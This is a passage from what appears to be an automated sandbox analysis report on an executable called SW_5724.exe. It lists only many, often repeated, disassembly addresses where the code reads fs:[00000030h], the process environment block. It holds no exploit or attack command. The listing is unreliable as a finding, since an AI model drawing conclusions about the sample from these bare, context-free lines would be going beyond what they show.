                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD8243 mov eax, dword ptr fs:[00000030h]6_2_01AD8243
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD8243 mov ecx, dword ptr fs:[00000030h]6_2_01AD8243
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B2625D mov eax, dword ptr fs:[00000030h]6_2_01B2625D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4A250 mov eax, dword ptr fs:[00000030h]6_2_01A4A250
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A56259 mov eax, dword ptr fs:[00000030h]6_2_01A56259
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD05A7 mov eax, dword ptr fs:[00000030h]6_2_01AD05A7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD05A7 mov eax, dword ptr fs:[00000030h]6_2_01AD05A7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD05A7 mov eax, dword ptr fs:[00000030h]6_2_01AD05A7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A745B1 mov eax, dword ptr fs:[00000030h]6_2_01A745B1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A745B1 mov eax, dword ptr fs:[00000030h]6_2_01A745B1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A84588 mov eax, dword ptr fs:[00000030h]6_2_01A84588
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A52582 mov eax, dword ptr fs:[00000030h]6_2_01A52582
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A52582 mov ecx, dword ptr fs:[00000030h]6_2_01A52582
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E59C mov eax, dword ptr fs:[00000030h]6_2_01A8E59C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E5E7 mov eax, dword ptr fs:[00000030h]6_2_01A7E5E7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A525E0 mov eax, dword ptr fs:[00000030h]6_2_01A525E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C5ED mov eax, dword ptr fs:[00000030h]6_2_01A8C5ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C5ED mov eax, dword ptr fs:[00000030h]6_2_01A8C5ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E5CF mov eax, dword ptr fs:[00000030h]6_2_01A8E5CF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E5CF mov eax, dword ptr fs:[00000030h]6_2_01A8E5CF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A565D0 mov eax, dword ptr fs:[00000030h]6_2_01A565D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A5D0 mov eax, dword ptr fs:[00000030h]6_2_01A8A5D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A5D0 mov eax, dword ptr fs:[00000030h]6_2_01A8A5D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60535 mov eax, dword ptr fs:[00000030h]6_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60535 mov eax, dword ptr fs:[00000030h]6_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60535 mov eax, dword ptr fs:[00000030h]6_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60535 mov eax, dword ptr fs:[00000030h]6_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60535 mov eax, dword ptr fs:[00000030h]6_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60535 mov eax, dword ptr fs:[00000030h]6_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E53E mov eax, dword ptr fs:[00000030h]6_2_01A7E53E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E53E mov eax, dword ptr fs:[00000030h]6_2_01A7E53E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E53E mov eax, dword ptr fs:[00000030h]6_2_01A7E53E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E53E mov eax, dword ptr fs:[00000030h]6_2_01A7E53E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E53E mov eax, dword ptr fs:[00000030h]6_2_01A7E53E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE6500 mov eax, dword ptr fs:[00000030h]6_2_01AE6500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24500 mov eax, dword ptr fs:[00000030h]6_2_01B24500
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8656A mov eax, dword ptr fs:[00000030h]6_2_01A8656A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8656A mov eax, dword ptr fs:[00000030h]6_2_01A8656A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8656A mov eax, dword ptr fs:[00000030h]6_2_01A8656A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58550 mov eax, dword ptr fs:[00000030h]6_2_01A58550
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58550 mov eax, dword ptr fs:[00000030h]6_2_01A58550
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A564AB mov eax, dword ptr fs:[00000030h]6_2_01A564AB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A844B0 mov ecx, dword ptr fs:[00000030h]6_2_01A844B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADA4B0 mov eax, dword ptr fs:[00000030h]6_2_01ADA4B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0A49A mov eax, dword ptr fs:[00000030h]6_2_01B0A49A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A504E5 mov ecx, dword ptr fs:[00000030h]6_2_01A504E5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4C427 mov eax, dword ptr fs:[00000030h]6_2_01A4C427
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E420 mov eax, dword ptr fs:[00000030h]6_2_01A4E420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E420 mov eax, dword ptr fs:[00000030h]6_2_01A4E420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E420 mov eax, dword ptr fs:[00000030h]6_2_01A4E420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A430 mov eax, dword ptr fs:[00000030h]6_2_01A8A430
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88402 mov eax, dword ptr fs:[00000030h]6_2_01A88402
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88402 mov eax, dword ptr fs:[00000030h]6_2_01A88402
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88402 mov eax, dword ptr fs:[00000030h]6_2_01A88402
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC460 mov ecx, dword ptr fs:[00000030h]6_2_01ADC460
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7A470 mov eax, dword ptr fs:[00000030h]6_2_01A7A470
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7A470 mov eax, dword ptr fs:[00000030h]6_2_01A7A470
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7A470 mov eax, dword ptr fs:[00000030h]6_2_01A7A470
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0A456 mov eax, dword ptr fs:[00000030h]6_2_01B0A456
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4645D mov eax, dword ptr fs:[00000030h]6_2_01A4645D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7245A mov eax, dword ptr fs:[00000030h]6_2_01A7245A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A507AF mov eax, dword ptr fs:[00000030h]6_2_01A507AF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B047A0 mov eax, dword ptr fs:[00000030h]6_2_01B047A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF678E mov eax, dword ptr fs:[00000030h]6_2_01AF678E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A727ED mov eax, dword ptr fs:[00000030h]6_2_01A727ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A727ED mov eax, dword ptr fs:[00000030h]6_2_01A727ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A727ED mov eax, dword ptr fs:[00000030h]6_2_01A727ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE7E1 mov eax, dword ptr fs:[00000030h]6_2_01ADE7E1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A547FB mov eax, dword ptr fs:[00000030h]6_2_01A547FB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A547FB mov eax, dword ptr fs:[00000030h]6_2_01A547FB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5C7C0 mov eax, dword ptr fs:[00000030h]6_2_01A5C7C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD07C3 mov eax, dword ptr fs:[00000030h]6_2_01AD07C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C720 mov eax, dword ptr fs:[00000030h]6_2_01A8C720
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C720 mov eax, dword ptr fs:[00000030h]6_2_01A8C720
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8273C mov eax, dword ptr fs:[00000030h]6_2_01A8273C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8273C mov ecx, dword ptr fs:[00000030h]6_2_01A8273C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8273C mov eax, dword ptr fs:[00000030h]6_2_01A8273C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACC730 mov eax, dword ptr fs:[00000030h]6_2_01ACC730
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C700 mov eax, dword ptr fs:[00000030h]6_2_01A8C700
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50710 mov eax, dword ptr fs:[00000030h]6_2_01A50710
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A80710 mov eax, dword ptr fs:[00000030h]6_2_01A80710
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58770 mov eax, dword ptr fs:[00000030h]6_2_01A58770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60770 mov eax, dword ptr fs:[00000030h]6_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8674D mov esi, dword ptr fs:[00000030h]6_2_01A8674D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8674D mov eax, dword ptr fs:[00000030h]6_2_01A8674D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8674D mov eax, dword ptr fs:[00000030h]6_2_01A8674D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE75D mov eax, dword ptr fs:[00000030h]6_2_01ADE75D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50750 mov eax, dword ptr fs:[00000030h]6_2_01A50750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD4755 mov eax, dword ptr fs:[00000030h]6_2_01AD4755
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92750 mov eax, dword ptr fs:[00000030h]6_2_01A92750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92750 mov eax, dword ptr fs:[00000030h]6_2_01A92750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C6A6 mov eax, dword ptr fs:[00000030h]6_2_01A8C6A6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A866B0 mov eax, dword ptr fs:[00000030h]6_2_01A866B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54690 mov eax, dword ptr fs:[00000030h]6_2_01A54690
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A54690 mov eax, dword ptr fs:[00000030h]6_2_01A54690
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD06F1 mov eax, dword ptr fs:[00000030h]6_2_01AD06F1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD06F1 mov eax, dword ptr fs:[00000030h]6_2_01AD06F1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE6F2 mov eax, dword ptr fs:[00000030h]6_2_01ACE6F2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A6C7 mov ebx, dword ptr fs:[00000030h]6_2_01A8A6C7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A6C7 mov eax, dword ptr fs:[00000030h]6_2_01A8A6C7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E627 mov eax, dword ptr fs:[00000030h]6_2_01A6E627
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A86620 mov eax, dword ptr fs:[00000030h]6_2_01A86620
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88620 mov eax, dword ptr fs:[00000030h]6_2_01A88620
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5262C mov eax, dword ptr fs:[00000030h]6_2_01A5262C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE609 mov eax, dword ptr fs:[00000030h]6_2_01ACE609
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6260B mov eax, dword ptr fs:[00000030h]6_2_01A6260B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92619 mov eax, dword ptr fs:[00000030h]6_2_01A92619
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A660 mov eax, dword ptr fs:[00000030h]6_2_01A8A660
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A660 mov eax, dword ptr fs:[00000030h]6_2_01A8A660
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A82674 mov eax, dword ptr fs:[00000030h]6_2_01A82674
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1866E mov eax, dword ptr fs:[00000030h]6_2_01B1866E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1866E mov eax, dword ptr fs:[00000030h]6_2_01B1866E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6C640 mov eax, dword ptr fs:[00000030h]6_2_01A6C640
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A0 mov eax, dword ptr fs:[00000030h]6_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A509AD mov eax, dword ptr fs:[00000030h]6_2_01A509AD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A509AD mov eax, dword ptr fs:[00000030h]6_2_01A509AD
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD89B3 mov esi, dword ptr fs:[00000030h]6_2_01AD89B3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD89B3 mov eax, dword ptr fs:[00000030h]6_2_01AD89B3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD89B3 mov eax, dword ptr fs:[00000030h]6_2_01AD89B3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADE9E0 mov eax, dword ptr fs:[00000030h]6_2_01ADE9E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A829F9 mov eax, dword ptr fs:[00000030h]6_2_01A829F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A829F9 mov eax, dword ptr fs:[00000030h]6_2_01A829F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1A9D3 mov eax, dword ptr fs:[00000030h]6_2_01B1A9D3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE69C0 mov eax, dword ptr fs:[00000030h]6_2_01AE69C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5A9D0 mov eax, dword ptr fs:[00000030h]6_2_01A5A9D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A849D0 mov eax, dword ptr fs:[00000030h]6_2_01A849D0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE892B mov eax, dword ptr fs:[00000030h]6_2_01AE892B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD892A mov eax, dword ptr fs:[00000030h]6_2_01AD892A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE908 mov eax, dword ptr fs:[00000030h]6_2_01ACE908
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACE908 mov eax, dword ptr fs:[00000030h]6_2_01ACE908
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48918 mov eax, dword ptr fs:[00000030h]6_2_01A48918
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A48918 mov eax, dword ptr fs:[00000030h]6_2_01A48918
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC912 mov eax, dword ptr fs:[00000030h]6_2_01ADC912
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A76962 mov eax, dword ptr fs:[00000030h]6_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A76962 mov eax, dword ptr fs:[00000030h]6_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A76962 mov eax, dword ptr fs:[00000030h]6_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E mov eax, dword ptr fs:[00000030h]6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E mov edx, dword ptr fs:[00000030h]6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9096E mov eax, dword ptr fs:[00000030h]6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC97C mov eax, dword ptr fs:[00000030h]6_2_01ADC97C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF4978 mov eax, dword ptr fs:[00000030h]6_2_01AF4978
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF4978 mov eax, dword ptr fs:[00000030h]6_2_01AF4978
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD0946 mov eax, dword ptr fs:[00000030h]6_2_01AD0946
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B24940 mov eax, dword ptr fs:[00000030h]6_2_01B24940
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50887 mov eax, dword ptr fs:[00000030h]6_2_01A50887
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC89D mov eax, dword ptr fs:[00000030h]6_2_01ADC89D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C8F9 mov eax, dword ptr fs:[00000030h]6_2_01A8C8F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8C8F9 mov eax, dword ptr fs:[00000030h]6_2_01A8C8F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1A8E4 mov eax, dword ptr fs:[00000030h]6_2_01B1A8E4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7E8C0 mov eax, dword ptr fs:[00000030h]6_2_01A7E8C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B208C0 mov eax, dword ptr fs:[00000030h]6_2_01B208C0
